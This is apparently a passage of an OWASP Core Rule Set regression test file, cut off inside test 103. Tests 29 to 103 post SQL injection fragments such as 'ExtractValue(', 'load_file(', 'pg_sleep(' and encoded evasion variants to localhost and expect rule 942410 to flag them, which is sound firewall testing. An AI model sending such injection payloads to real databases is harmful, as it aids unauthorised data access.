text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=format%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 45 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 46 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 47 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 48 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 49 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 50 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 51 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 52 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 53 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 54 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 55 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 56 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 57 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=local%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 58 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 59 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 60 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 61 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 62 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 63 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 64 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 65 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 66 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 67 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 68 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "name_const(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 69 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "now(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 70 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "nOW(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 71 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ord(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 72 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password?(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 73 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password/?(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 74 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Password>$(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 75 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 76 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pi(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 77 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "PI(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 78 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pow(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 79 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "POW(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 80 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "quarter. (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 81 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rand(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 82 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Rand (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 83 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RAND(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 84 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "replace(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 85 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "REPLACE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 86 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 87 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 88 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rtrim(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 89 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RTRIM(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 90 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sin (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 91 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SIN(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 92 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 93 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SLEEP (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 94 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 95 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substr(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 96 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 97 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substring(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 98 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 99 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 100 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "time (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 101 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=time%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 102 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 103 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log: + expect_ids: 